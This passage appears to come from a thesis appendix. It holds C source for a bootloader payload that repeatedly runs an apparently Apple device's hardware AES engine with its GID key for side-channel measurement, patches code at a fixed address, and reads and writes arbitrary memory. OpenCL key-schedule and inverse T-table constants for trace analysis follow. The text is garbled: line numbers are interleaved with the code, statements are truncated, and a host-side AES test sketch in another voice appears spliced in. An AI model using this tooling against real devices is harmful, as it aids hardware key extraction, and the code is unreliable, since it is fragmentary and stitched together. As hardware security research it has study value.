%02x%02x%02x%02x",seeds[1][0],seeds[1][1],seeds[1][2],seeds[1][3],seeds[1][4], seeds[1][5],seeds[1][6],seeds[1][7],seeds[1][8],seeds[1][9],seeds[1][10],seeds 
[1][11],seeds[1][12],seeds[1][13],seeds[1][14],seeds[1][15]); 531 uart_puts(0,printBuf); 532 uart_puts(0,"\n"); 533 534 }else if (mode == 3){ //MODE: random with userkey decrypt cbc 535 if (seedsLen != 48){ 536 uart_puts(0,"[M] invalid seedsLen="); 537 _snprintf(printBuf, sizeof(printBuf), "%d", seedsLen); 538 uart_puts(0,printBuf); 539 uart_puts(0," but expected 48\n"); 540 break; 541 } 542 uint8_t plainmesh[16]; 543 memset(plainmesh,0,sizeof(plainmesh)); 544 545 uart_puts(0,"[M] seed encrypt="); 546 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x %02x%02x%02x%02x",seeds[0][0],seeds[0][1],seeds[0][2],seeds[0][3],seeds[0][4], seeds[0][5],seeds[0][6],seeds[0][7],seeds[0][8],seeds[0][9],seeds[0][10],seeds [0][11],seeds[0][12],seeds[0][13],seeds[0][14],seeds[0][15]); 547 uart_puts(0,printBuf); 548 uart_puts(0,"\n[M] user key="); 549 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x 80 BCode

%02x%02x%02x%02x",seeds[1][0],seeds[1][1],seeds[1][2],seeds[1][3],seeds[1][4], seeds[1][5],seeds[1][6],seeds[1][7],seeds[1][8],seeds[1][9],seeds[1][10],seeds [1][11],seeds[1][12],seeds[1][13],seeds[1][14],seeds[1][15]); 550 uart_puts(0,printBuf); 551 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x %02x%02x%02x%02x",seeds[2][0],seeds[2][1],seeds[2][2],seeds[2][3],seeds[2][4], seeds[2][5],seeds[2][6],seeds[2][7],seeds[2][8],seeds[2][9],seeds[2][10],seeds [2][11],seeds[2][12],seeds[2][13],seeds[2][14],seeds[2][15]); 552 uart_puts(0,printBuf); 553 uart_puts(0,"\n[M] encCount="); 554 _snprintf(printBuf, sizeof(printBuf), "%lu\n",encCount); 555 uart_puts(0,printBuf); 556 557 for (long z =0;z < encCount; z++) { 558 aes_encrypt(seeds[0],roundkeys,cipherEnc); 559 560 for (size_t m =0;m

597 uart_puts(0,"\n[M] user key="); 598 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x %02x%02x%02x%02x",seeds[1][0],seeds[1][1],seeds[1][2],seeds[1][3],seeds[1][4], seeds[1][5],seeds[1][6],seeds[1][7],seeds[1][8],seeds[1][9],seeds[1][10],seeds [1][11],seeds[1][12],seeds[1][13],seeds[1][14],seeds[1][15]); 599 uart_puts(0,printBuf); 600 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x %02x%02x%02x%02x",seeds[2][0],seeds[2][1],seeds[2][2],seeds[2][3],seeds[2][4], seeds[2][5],seeds[2][6],seeds[2][7],seeds[2][8],seeds[2][9],seeds[2][10],seeds [2][11],seeds[2][12],seeds[2][13],seeds[2][14],seeds[2][15]); 601 uart_puts(0,printBuf); 602 uart_puts(0,"\n[M] encCount="); 603 _snprintf(printBuf, sizeof(printBuf), "%lu\n",encCount); 604 uart_puts(0,printBuf); 605 606 uint8_t aesIn[128]; 607 uint8_t aesOut[128]; 608 609 for (long z =0;z < encCount; z++) { 610 for (int mult =0;mult

647 648 uart_puts(0,"[M] seed encrypt="); 649 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x %02x%02x%02x%02x",seeds[0][0],seeds[0][1],seeds[0][2],seeds[0][3],seeds[0][4], seeds[0][5],seeds[0][6],seeds[0][7],seeds[0][8],seeds[0][9],seeds[0][10],seeds [0][11],seeds[0][12],seeds[0][13],seeds[0][14],seeds[0][15]); 650 uart_puts(0,printBuf); 651 uart_puts(0,"\n[M] encCount="); 652 _snprintf(printBuf, sizeof(printBuf), "%lu\n",encCount); 653 uart_puts(0,printBuf); 654 655 uint8_t aesIn[128]; 656 uint8_t aesOut[128]; 657 658 for (long z =0;z < encCount; z++) { 659 for (int mult =0;mult<16byte sel seed> END 83

\")\n"); 700 } 701 uart_puts(0,"exit measure mode\n"); 702 703 //restore task_yield to original value 704 *((uint16_t*)0x5ff1f008)=0xb5f0; 705 clear_icache(); 706 707 return 0; 708 } 709 710 711 int cmd_md(int argc, CmdArg* argv){ 712 if(argc != 3) { 713 _printf("usage: md \n"); 714 return 0; 715 } 716 char *addrstr = argv[1].string; 717 char *sizestr = argv[2].string; 718 719 if (sizestr[0] == ’0’ && sizestr[1] == ’x’){ 720 sizestr+=2; 721 } 722 if (addrstr[0] == ’0’ && addrstr[1] == ’x’){ 723 addrstr+=2; 724 } 725 uint32_t addr =0; 726 uint32_t size =0; 727 size_t rt =0; 728 729 parseHex(addrstr,&addr,&rt); 730 if (rt >4){ 731 _printf("ERROR: cmd_md addr %s too large (%d)\n",addrstr,rt); 732 return 0; 733 } 734 addr = bswap32(addr); 735 _printf("addrstr=%s (0x%08x)\n",addrstr,addr); 736 737 parseHex(sizestr,(char*)&size,&rt); 738 if (rt >4){ 739 _printf("ERROR: cmd_md size %s too large (%d)\n",sizestr,rt); 740 return 0; 741 } 742 size = bswap32(size); 743 744 _printf("dumping 0x%s (0x%08x) of size 0x%s (0x%08x)\n",addrstr,addr,sizestr,size); 745 DumpHex((void*)addr,size); 746 _printf("md done!\n"); 747 return 0; 748 } 749 750 int cmd_mw(int argc, CmdArg* argv){ 751 if(argc != 3) { 752 _printf("usage: md \n"); 753 return 0; 754 } 755 char *addrstr = argv[1].string; 756 char *datastr = argv[2].string; 757 758 if (addrstr[0] == ’0’ && addrstr[1] == ’x’){ 759 addrstr+=2; 760 } 84 BCode

761 762 unsigned char *addr =0; 763 uint32_t size =0; 764 size_t rt =0; 765 uint32_t tmp =0; 766 767 768 size_t bindatalen = strlen(datastr); 769 if (bindatalen &1){ 770 _printf("ERROR: cmd_mw data not multiple of 2\n"); 771 return 0; 772 } 773 774 unsigned char *bindata = _malloc(bindatalen+1); 775 776 parseHex(addrstr,(char*)&addr,&rt); 777 if (rt >4){ 778 _printf("ERROR: cmd_mw addr %s too large (%d)\n",addrstr,rt); 779 return 0; 780 } 781 addr = bswap32(addr); 782 783 if (!parseHex(datastr,(char*)bindata,&rt)){ 784 for (int i=0; i [data]\n"); 807 return 0; 808 } 809 810 action =(char*)argv[1].string; 811 kbag =(char*)argv[2].string; 812 813 size = atol(kbag); 814 _printf("aes_key insize=%d\n",size); 815 if((size&1)) { 816 _printf("ERROR: aes_encrypt_key\n"); 817 return 0; 818 } 819 aesIN = _malloc(size); 820 aesOUT = _malloc(size); 821 memset(aesIN,0,size); 822 memset(aesOUT,0,size); 85


    if(!strcmp(action, "enc")) {
        _printf("aes do enc\n");
        aes_encrypt_key_custom((char*)aesIN,(char*)aesOUT, size, fixedKey);
    } else if(!strcmp(action, "loopSame")) {
        while (gpio_read(GPIO_VOL_UP)){
            aes_decrypt_key_custom((char*)aesIN,(char*)aesOUT, size, fixedKey);
        }
    } else if(!strcmp(action, "loopSameGid")) {
        while (gpio_read(GPIO_VOL_UP)){
            aes_decrypt_key((char*)aesIN,(char*)aesOUT, size);
        }
    } else if(!strcmp(action, "loopDiff")) {
        while (gpio_read(GPIO_VOL_UP)){
            aes_encrypt_key_custom((char*)aesIN,(char*)aesOUT, size, fixedKey);
            aes_encrypt_key_custom((char*)aesOUT,(char*)aesIN, size, fixedKey);
        }
    } else {
        _free(aesOUT);
        _free(aesIN);
        return -1;
    }

    for(i = 0; i < size; i++) {
        _printf("%02x", aesOUT[i]);
    }
    _printf("\n");

    _free(aesOUT);
    _free(aesIN);
    return 0;
}

#pragma mark aes engine wrappers

unsigned int aes_encrypt_key(char* in, char* out, unsigned int size){
    aes_crypto_cmd(kAesEncrypt, in, out, size, kAesTypeGid | kAesType256,0,0);
    return size;
}

unsigned int aes_decrypt_key(char* in, char* out, unsigned int size){
    aes_crypto_cmd(kAesDecrypt, in, out, size, kAesTypeGid | kAesType256,0,0);
    return size;
}

unsigned int aes_encrypt_key_custom(char* in, char* out, unsigned int size, void *key){
    aes_crypto_cmd(kAesEncrypt, in, out, size, kAesTypeUser | kAesType256, key,0);
    return size;
}

unsigned int aes_decrypt_key_custom(char* in, char* out, unsigned int size, void *key){
    aes_crypto_cmd(kAesDecrypt, in, out, size, kAesTypeUser | kAesType256, key,0);
    return size;
}

#pragma mark helper functions

uint32_t bswap32(uint32_t num){
    return ((num>>24)&0xff) | // move byte 3 to byte 0
           ((num<<8)&0xff0000) | // move byte 1 to byte 2
           ((num>>8)&0xff00) | // move byte 2 to byte 1
           ((num<<24)&0xff000000); // byte 0 to byte 3
}

int parseHex(const char *instr, char *ret, size_t *outSize){
    size_t nonceLen = strlen(instr);
    nonceLen = (nonceLen>>1) + (nonceLen&1); //one byte more if len is odd

    if (outSize) *outSize = (nonceLen)*sizeof(char);
    if (!ret) return 0;

    memset(ret,0,*outSize);
    unsigned int nlen = 0;

    int next = (strlen(instr)&1) == 0;
    char tmp = 0;
    while (*instr){
        char c = *(instr++);

        tmp *= 16;
        if (c >= '0' && c <= '9'){
            tmp += c - '0';
        }else if (c >= 'a' && c <= 'f'){
            tmp += 10 + c - 'a';
        }else if (c >= 'A' && c <= 'F'){
            tmp += 10 + c - 'A';
        }else{
            return -1; //ERROR parsing failed
        }
        if ((next = !next) && nlen < nonceLen) ret[nlen++] = tmp,tmp=0;
    }

    if (outSize) *outSize = nlen;
    return 0;
}

void DumpHex(const void* data, size_t size){
    char ascii[17];
    size_t i, j;
    ascii[16] = '\0';
    for (i = 0; i < size; ++i){
        _printf("%02X ",((unsigned char*)data)[i]);
        if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~'){
            ascii[i % 16] = ((unsigned char*)data)[i];
        } else {
            ascii[i % 16] = '.';
        }
        if ((i+1) % 8 == 0 || i+1 == size){
            _printf(" ");
            if ((i+1) % 16 == 0) {
                _printf("| %s \n", ascii);
            } else if (i+1 == size){
                ascii[(i+1) % 16] = '\0';
                if ((i+1) % 16 <= 8) {
                    _printf(" ");
                }
                for (j = (i+1) % 16; j < 16; ++j){
                    _printf(" ");
                }
                _printf("| %s \n", ascii);
            }
        }
    }
}

void clear_icache() {
    __asm__("mov r0, #0");
    __asm__("mcr p15, 0, r0, c7, c5, 0");
    __asm__("isb");
    __asm__("nop");
    __asm__("nop");
    __asm__("nop");
    __asm__("nop");
};

#pragma mark stdfuncs

void memset(void *a, unsigned char b, size_t len){
    while(len--){
        *((unsigned char*)a) = b;
        a = ((unsigned char*)a)+1;
    }
}

void memmove(void *dst, void *src, size_t len){
    uint8_t *d = (uint8_t *)dst;
    uint8_t *s = (uint8_t *)src;
    while (len--) {
        *d++ = *s++;
    }
}

int strncmp(const char *a, const char *b, uint32_t n){
    char d = 0;
    while (n-- && *a && !(d = *a++ - *b++));
    return d;
}

int strcmp(const char *a, const char *b){
    char d = 0;
    while (*a && !(d = *a++ - *b++));
    return d;
}

int strlen(const char *s){
    int res = 0;
    for (; *s++; res++);
    return res;
}

long atol(const char *s){
    long res = 0;
    int neg = 0;
    while (*s == ' ') s++;

    if (*s == '-'){
        s++;
        neg = 1;
    }

    do{
        if (*s < '0' || *s > '9') return (neg) ? -res : res;
        res *= 10;
        res += *s - '0';
    }while(*++s);

    return (neg) ? -res : res;
}

#pragma mark AES

void aes_precompute_tables(){
    T0 = _malloc(256*sizeof(uint32_t));
    T1 = _malloc(256*sizeof(uint32_t));
    T2 = _malloc(256*sizeof(uint32_t));
    T3 = _malloc(256*sizeof(uint32_t));
    for (int x=0; x<0x100; x++) {
        uint8_t b[4];
        b[0] = sbox[x];
        b[1] = sbox[x];
        b[2] = sbox[x];
        b[3] = sbox[x];

        b[0] = ((b[0] & 0x80)==0) ? (b[0] << 1) : (b[0] << 1) ^ 0x1b;
        b[3] = ((b[3] & 0x80)==0) ? (b[3] << 1) : (b[3] << 1) ^ 0x1b;
        b[3] ^= b[1];

        T0[x] = (b[0] << 0) | (b[1] << 8) | (b[2] << 16) | (b[3] << 24);
        T1[x] = (b[3] << 0) | (b[0] << 8) | (b[1] << 16) | (b[2] << 24);
        T2[x] = (b[2] << 0) | (b[3] << 8) | (b[0] << 16) | (b[1] << 24);
        T3[x] = (b[1] << 0) | (b[2] << 8) | (b[3] << 16) | (b[0] << 24);
    }
}


void aes_encrypt(uint8_t plaintext[16], uint8_t roundkeys[11][16], uint8_t ciphertext[16]){
    uint8_t tmp[16] = {0};

    for (int i=0; i<16; i++){ //pre key add
        tmp[i] = plaintext[i]^roundkeys[0][i];
    }

    uint32_t w[4] = {0};
    for (int i=1; i<10; i++) { //9 middle rounds

        w[0] = T0[tmp[ 0]] ^ T1[tmp[ 5]] ^ T2[tmp[10]] ^ T3[tmp[15]] ^ *(uint32_t*)&roundkeys[i][0];
        w[1] = T0[tmp[ 4]] ^ T1[tmp[ 9]] ^ T2[tmp[14]] ^ T3[tmp[ 3]] ^ *(uint32_t*)&roundkeys[i][4];
        w[2] = T0[tmp[ 8]] ^ T1[tmp[13]] ^ T2[tmp[ 2]] ^ T3[tmp[ 7]] ^ *(uint32_t*)&roundkeys[i][8];
        w[3] = T0[tmp[12]] ^ T1[tmp[ 1]] ^ T2[tmp[ 6]] ^ T3[tmp[11]] ^ *(uint32_t*)&roundkeys[i][12];

        *(uint32_t*)&tmp[0] = w[0];
        *(uint32_t*)&tmp[4] = w[1];
        *(uint32_t*)&tmp[8] = w[2];
        *(uint32_t*)&tmp[12] = w[3];
    }

    for (int i=0; i<4; i++) { //final round
        ciphertext[4*i + 0] = sbox[tmp[4*i]] ^ roundkeys[10][4*i + 0];
        ciphertext[4*i + 1] = sbox[tmp[(4*i + 5)&0xf]] ^ roundkeys[10][4*i + 1];
        ciphertext[4*i + 2] = sbox[tmp[(4*i + 10)&0xf]] ^ roundkeys[10][4*i + 2];
        ciphertext[4*i + 3] = sbox[tmp[(4*i + 15)&0xf]] ^ roundkeys[10][4*i + 3];
    }
}

Listing B.4: Source code for device payload
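The software AES in Listing B.4 (aes_precompute_tables and aes_encrypt) can be checked off-device. The following is a minimal host-side sketch, not part of the payload: it rebuilds the four T-tables with the same byte layout as the listing, expands the key 00 01 ... 0f, and compares the result against the FIPS-197 Appendix C.1 test vector and against the last row of the roundkeys table. All function names here (build_sbox, build_tables, expand_key, aes128_encrypt, aes_sketch_selftest) are hypothetical. As an assumption, the S-box is regenerated algorithmically instead of being copied from the listing, and words are loaded and stored byte by byte so that the check does not depend on host endianness.

```c
#include <stdint.h>
#include <string.h>

#define ROTL8(x, n) ((uint8_t)(((x) << (n)) | ((x) >> (8 - (n)))))

static uint8_t  sbox[256];
static uint32_t T0[256], T1[256], T2[256], T3[256];

/* Multiply by 2 in GF(2^8) modulo the AES polynomial 0x11b. */
static uint8_t xtime(uint8_t v) {
    return (uint8_t)((v << 1) ^ ((v & 0x80) ? 0x1b : 0x00));
}

/* Regenerate the AES S-box (assumed identical to sbox[] in the listing). */
static void build_sbox(void) {
    uint8_t p = 1, q = 1;
    do {
        p = (uint8_t)(p ^ (p << 1) ^ ((p & 0x80) ? 0x1b : 0)); /* p *= 3 */
        q ^= (uint8_t)(q << 1);                                 /* q /= 3 */
        q ^= (uint8_t)(q << 2);
        q ^= (uint8_t)(q << 4);
        q ^= (q & 0x80) ? 0x09 : 0;
        sbox[p] = (uint8_t)(q ^ ROTL8(q, 1) ^ ROTL8(q, 2) ^ ROTL8(q, 3)
                              ^ ROTL8(q, 4) ^ 0x63);
    } while (p != 1);
    sbox[0] = 0x63; /* 0 has no inverse */
}

/* Same packing as aes_precompute_tables: T0 bytes are (2s, s, s, 3s). */
static void build_tables(void) {
    for (int x = 0; x < 256; x++) {
        uint32_t s = sbox[x], s2 = xtime(sbox[x]), s3 = s2 ^ s;
        T0[x] = s2 | (s  << 8) | (s  << 16) | (s3 << 24);
        T1[x] = s3 | (s2 << 8) | (s  << 16) | (s  << 24);
        T2[x] = s  | (s3 << 8) | (s2 << 16) | (s  << 24);
        T3[x] = s  | (s  << 8) | (s3 << 16) | (s2 << 24);
    }
}

/* Standard AES-128 key schedule, stored as 11 round keys of 16 bytes. */
static void expand_key(const uint8_t key[16], uint8_t rk[11][16]) {
    uint8_t *w = &rk[0][0];
    uint8_t rcon = 1;
    memcpy(w, key, 16);
    for (int i = 16; i < 176; i += 4) {
        uint8_t t[4] = { w[i - 4], w[i - 3], w[i - 2], w[i - 1] };
        if (i % 16 == 0) { /* RotWord, SubWord, Rcon */
            uint8_t t0 = t[0];
            t[0] = sbox[t[1]] ^ rcon; t[1] = sbox[t[2]];
            t[2] = sbox[t[3]];        t[3] = sbox[t0];
            rcon = xtime(rcon);
        }
        for (int j = 0; j < 4; j++) w[i + j] = w[i - 16 + j] ^ t[j];
    }
}

static uint32_t load_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8)
         | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* T-table encryption with the same indexing as aes_encrypt in the listing. */
static void aes128_encrypt(const uint8_t pt[16], uint8_t rk[11][16], uint8_t ct[16]) {
    uint8_t st[16];
    for (int i = 0; i < 16; i++) st[i] = pt[i] ^ rk[0][i];
    for (int r = 1; r < 10; r++) {
        uint32_t w[4];
        for (int c = 0; c < 4; c++)
            w[c] = T0[st[4 * c]] ^ T1[st[(4 * c + 5) & 15]]
                 ^ T2[st[(4 * c + 10) & 15]] ^ T3[st[(4 * c + 15) & 15]]
                 ^ load_le32(&rk[r][4 * c]);
        for (int c = 0; c < 4; c++)
            for (int j = 0; j < 4; j++)
                st[4 * c + j] = (uint8_t)(w[c] >> (8 * j));
    }
    for (int c = 0; c < 4; c++)     /* final round: no MixColumns */
        for (int j = 0; j < 4; j++)
            ct[4 * c + j] = sbox[st[(4 * c + 5 * j) & 15]] ^ rk[10][4 * c + j];
}

/* Returns 1 if both the last round key and the ciphertext match. */
int aes_sketch_selftest(void) {
    static const uint8_t rk10[16] = { /* last row of roundkeys[] */
        0x13,0x11,0x1d,0x7f,0xe3,0x94,0x4a,0x17,0xf3,0x07,0xa7,0x8b,0x4d,0x2b,0x30,0xc5 };
    static const uint8_t expect[16] = { /* FIPS-197 Appendix C.1 ciphertext */
        0x69,0xc4,0xe0,0xd8,0x6a,0x7b,0x04,0x30,0xd8,0xcd,0xb7,0x80,0x70,0xb4,0xc5,0x5a };
    uint8_t key[16], pt[16], ct[16], rk[11][16];
    for (int i = 0; i < 16; i++) { key[i] = (uint8_t)i; pt[i] = (uint8_t)(0x11 * i); }
    build_sbox(); build_tables(); expand_key(key, rk);
    aes128_encrypt(pt, rk, ct);
    return memcmp(rk[10], rk10, 16) == 0 && memcmp(ct, expect, 16) == 0;
}
```

Calling aes_sketch_selftest() from a small host program should return 1 if the table layout is understood correctly. The payload itself reads and writes 32-bit words through pointer casts, which gives the same result only on a little-endian target.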

#define AES_BLOCK_SELECTOR 4
#define AES_BLOCKS_TOTAL 8 //8*16 = 128bytes

#define G_SELECTOR_ROUND 4

struct MeasurementStructure{
    uint NumberOfPoints;

    uchar _shiftp[AES_BLOCK_SELECTOR*16];
    uchar Input[AES_BLOCKS_TOTAL*16 - AES_BLOCK_SELECTOR*16];

    uchar _shiftc[AES_BLOCK_SELECTOR*16];
    uchar Output[AES_BLOCKS_TOTAL*16 - AES_BLOCK_SELECTOR*16];

    char Trace[0];
};

struct Tracefile{
    uint tracesInFile;
    struct MeasurementStructure ms[0];
};

__constant uchar aeskey[16*15] = {
    0x00,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x09,0x0a,0x0b,0x0c,0x0d,0x0e,0x0f,
    0x00,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x09,0x0a,0x0b,0x0c,0x0d,0x0e,0x0f,
    0xd6,0xaa,0x74,0xfd,0xd2,0xaf,0x72,0xfa,0xda,0xa6,0x78,0xf1,0xd6,0xab,0x76,0xfe,
    0xf6,0x63,0x3a,0xb8,0xf2,0x66,0x3c,0xbf,0xfa,0x6f,0x36,0xb4,0xf6,0x62,0x38,0xbb,
    0x7e,0xad,0x9e,0xbf,0xac,0x02,0xec,0x45,0x76,0xa4,0x94,0xb4,0xa0,0x0f,0xe2,0x4a,
    0x16,0x15,0xa2,0x6e,0xe4,0x73,0x9e,0xd1,0x1e,0x1c,0xa8,0x65,0xe8,0x7e,0x90,0xde,
    0x89,0xcd,0x83,0x24,0x25,0xcf,0x6f,0x61,0x53,0x6b,0xfb,0xd5,0xf3,0x64,0x19,0x9f,
    0x1b,0x56,0x76,0xb5,0xff,0x25,0xe8,0x64,0xe1,0x39,0x40,0x01,0x09,0x47,0xd0,0xdf,
    0x21,0xbd,0x1d,0x25,0x04,0x72,0x72,0x44,0x57,0x19,0x89,0x91,0xa4,0x7d,0x90,0x0e,
    0x52,0xa9,0x16,0x1e,0xad,0x8c,0xfe,0x7a,0x4c,0xb5,0xbe,0x7b,0x45,0xf2,0x6e,0xa4,
    0xb8,0x22,0x54,0x4b,0xbc,0x50,0x26,0x0f,0xeb,0x49,0xaf,0x9e,0x4f,0x34,0x3f,0x90,
    0xd6,0xb1,0x63,0x7e,0x7b,0x3d,0x9d,0x04,0x37,0x88,0x23,0x7f,0x72,0x7a,0x4d,0xdb,
    0x42,0xc1,0xed,0x0b,0xfe,0x91,0xcb,0x04,0x15,0xd8,0x64,0x9a,0x5a,0xec,0x5b,0x0a,
    0x68,0x7f,0x5a,0x19,0x13,0x42,0xc7,0x1d,0x24,0xca,0xe4,0x62,0x56,0xb0,0xa9,0xb9,
    0xe5,0x12,0xbb,0xba,0x1b,0x83,0x70,0xbe,0x0e,0x5b,0x14,0x24,0x54,0xb7,0x4f,0x2e
};

__constant uint T0_inv[256]={
    0x50a7f451,0x5365417e,0xc3a4171a,0x965e273a,0xcb6bab3b,0xf1459d1f,0xab58faac,0x9303e34b,0x55fa3020,0xf66d76ad,0x9176cc88,0x254c02f5,0xfcd7e54f,0xd7cb2ac5,0x80443526,0x8fa362b5,
    0x495ab1de,0x671bba25,0x980eea45,0xe1c0fe5d,0x02752fc3,0x12f04c81,0xa397468d,0xc6f9d36b,0xe75f8f03

,0x959c9215,0xeb7a6dbf,0xda595295,0x2d83bed4,0xd3217458,0x2969e049,0x44c8c98e, 44 0x6a89c275,0x78798ef4,0x6b3e5899,0xdd71b927,0xb64fe1be,0x17ad88f0,0x66ac20c9,0xb43ace7d,0x184adf63 ,0x82311ae5,0x60335197,0x457f5362,0xe07764b1,0x84ae6bbb,0x1ca081fe,0x942b08f9, 45 0x58684870,0x19fd458f,0x876cde94,0xb7f87b52,0x23d373ab,0xe2024b72,0x578f1fe3,0x2aab5566,0x0728ebb2 ,0x03c2b52f,0x9a7bc586,0xa50837d3,0xf2872830,0xb2a5bf23,0xba6a0302,0x5c8216ed, 46 0x2b1ccf8a,0x92b479a7,0xf0f207f3,0xa1e2694e,0xcdf4da65,0xd5be0506,0x1f6234d1,0x8afea6c4,0x9d532e34 ,0xa055f3a2,0x32e18a05,0x75ebf6a4,0x39ec830b,0xaaef6040,0x069f715e,0x51106ebd, 47 0xf98a213e,0x3d06dd96,0xae053edd,0x46bde64d,0xb58d5491,0x055dc471,0x6fd40604,0xff155060,0x24fb9819 ,0x97e9bdd6,0xcc434089,0x779ed967,0xbd42e8b0,0x888b8907,0x385b19e7,0xdbeec879, 48 0x470a7ca1,0xe90f427c,0xc91e84f8,0x00000000,0x83868009,0x48ed2b32,0xac70111e,0x4e725a6c,0xfbff0efd ,0x5638850f,0x1ed5ae3d,0x27392d36,0x64d90f0a,0x21a65c68,0xd1545b9b,0x3a2e3624, 49 0xb1670a0c,0x0fe75793,0xd296eeb4,0x9e919b1b,0x4fc5c080,0xa220dc61,0x694b775a,0x161a121c,0x0aba93e2 ,0xe52aa0c0,0x43e0223c,0x1d171b12,0x0b0d090e,0xadc78bf2,0xb9a8b62d,0xc8a91e14, 50 0x8519f157,0x4c0775af,0xbbdd99ee,0xfd607fa3,0x9f2601f7,0xbcf5725c,0xc53b6644,0x347efb5b,0x7629438b ,0xdcc623cb,0x68fcedb6,0x63f1e4b8,0xcadc31d7,0x10856342,0x40229713,0x2011c684, 51 0x7d244a85,0xf83dbbd2,0x1132f9ae,0x6da129c7,0x4b2f9e1d,0xf330b2dc,0xec52860d,0xd0e3c177,0x6c16b32b ,0x99b970a9,0xfa489411,0x2264e947,0xc48cfca8,0x1a3ff0a0,0xd82c7d56,0xef903322, 52 0xc74e4987,0xc1d138d9,0xfea2ca8c,0x360bd498,0xcf81f5a6,0x28de7aa5,0x268eb7da,0xa4bfad3f,0xe49d3a2c ,0x0d927850,0x9bcc5f6a,0x62467e54,0xc2138df6,0xe8b8d890,0x5ef7392e,0xf5afc382, 53 0xbe805d9f,0x7c93d069,0xa92dd56f,0xb31225cf,0x3b99acc8,0xa77d1810,0x6e639ce8,0x7bbb3bdb,0x097826cd ,0xf418596e,0x01b79aec,0xa89a4f83,0x656e95e6,0x7ee6ffaa,0x08cfbc21,0xe6e815ef, 54 0xd99be7ba,0xce366f4a,0xd4099fea,0xd67cb029,0xafb2a431,0x31233f2a,0x3094a5c6,0xc066a235,0x37bc4e74 
,0xa6ca82fc,0xb0d090e0,0x15d8a733,0x4a9804f1,0xf7daec41,0x0e50cd7f,0x2ff69117, 55 0x8dd64d76,0x4db0ef43,0x544daacc,0xdf0496e4,0xe3b5d19e,0x1b886a4c,0xb81f2cc1,0x7f516546,0x04ea5e9d ,0x5d358c01,0x737487fa,0x2e410bfb,0x5a1d67b3,0x52d2db92,0x335610e9,0x1347d66d, 56 0x8c61d79a,0x7a0ca137,0x8e14f859,0x893c13eb,0xee27a9ce,0x35c961b7,0xede51ce1,0x3cb1477a,0x59dfd29c ,0x3f73f255,0x79ce1418,0xbf37c773,0xeacdf753,0x5baafd5f,0x146f3ddf,0x86db4478, 57 0x81f3afca,0x3ec468b9,0x2c342438,0x5f40a3c2,0x72c31d16,0x0c25e2bc,0x8b493c28,0x41950dff,0x7101a839 ,0xdeb30c08,0x9ce4b4d8,0x90c15664,0x6184cb7b,0x70b632d5,0x745c6c48,0x4257b8d0}; 58 59 __constant uint T1_inv[256]={ 60 0xa7f45150,0x65417e53,0xa4171ac3,0x5e273a96,0x6bab3bcb,0x459d1ff1,0x58faacab,0x03e34b93,0xfa302055 ,0x6d76adf6,0x76cc8891,0x4c02f525,0xd7e54ffc,0xcb2ac5d7,0x44352680,0xa362b58f, 61 0x5ab1de49,0x1bba2567,0x0eea4598,0xc0fe5de1,0x752fc302,0xf04c8112,0x97468da3,0xf9d36bc6,0x5f8f03e7 ,0x9c921595,0x7a6dbfeb,0x595295da,0x83bed42d,0x217458d3,0x69e04929,0xc8c98e44, 62 0x89c2756a,0x798ef478,0x3e58996b,0x71b927dd,0x4fe1beb6,0xad88f017,0xac20c966,0x3ace7db4,0x4adf6318 ,0x311ae582,0x33519760,0x7f536245,0x7764b1e0,0xae6bbb84,0xa081fe1c,0x2b08f994, 63 0x68487058,0xfd458f19,0x6cde9487,0xf87b52b7,0xd373ab23,0x024b72e2,0x8f1fe357,0xab55662a,0x28ebb207 ,0xc2b52f03,0x7bc5869a,0x0837d3a5,0x872830f2,0xa5bf23b2,0x6a0302ba,0x8216ed5c, 64 0x1ccf8a2b,0xb479a792,0xf207f3f0,0xe2694ea1,0xf4da65cd,0xbe0506d5,0x6234d11f,0xfea6c48a,0x532e349d ,0x55f3a2a0,0xe18a0532,0xebf6a475,0xec830b39,0xef6040aa,0x9f715e06,0x106ebd51, 65 0x8a213ef9,0x06dd963d,0x053eddae,0xbde64d46,0x8d5491b5,0x5dc47105,0xd406046f,0x155060ff,0xfb981924 ,0xe9bdd697,0x434089cc,0x9ed96777,0x42e8b0bd,0x8b890788,0x5b19e738,0xeec879db, 66 0x0a7ca147,0x0f427ce9,0x1e84f8c9,0x00000000,0x86800983,0xed2b3248,0x70111eac,0x725a6c4e,0xff0efdfb ,0x38850f56,0xd5ae3d1e,0x392d3627,0xd90f0a64,0xa65c6821,0x545b9bd1,0x2e36243a, 67 
    0x670a0cb1,0xe757930f,0x96eeb4d2,0x919b1b9e,0xc5c0804f,0x20dc61a2,0x4b775a69,0x1a121c16,0xba93e20a,0x2aa0c0e5,0xe0223c43,0x171b121d,0x0d090e0b,0xc78bf2ad,0xa8b62db9,0xa91e14c8,
    0x19f15785,0x0775af4c,0xdd99eebb,0x607fa3fd,0x2601f79f,0xf5725cbc,0x3b6644c5,0x7efb5b34,0x29438b76,0xc623cbdc,0xfcedb668,0xf1e4b863,0xdc31d7ca,0x85634210,0x22971340,0x11c68420,
    0x244a857d,0x3dbbd2f8,0x32f9ae11,0xa129c76d,0x2f9e1d4b,0x30b2dcf3,0x52860dec,0xe3c177d0,0x16b32b6c,0xb970a999,0x489411fa,0x64e94722,0x8cfca8c4,0x3ff0a01a,0x2c7d56d8,0x903322ef,
    0x4e4987c7,0xd138d9c1,0xa2ca8cfe,0x0bd49836,0x81f5a6cf,0xde7aa528,0x8eb7da26,0xbfad3fa4,0x9d3a2ce4,0x9278500d,0xcc5f6a9b,0x467e5462,0x138df6c2,0xb8d890e8,0xf7392e5e,0xafc382f5,
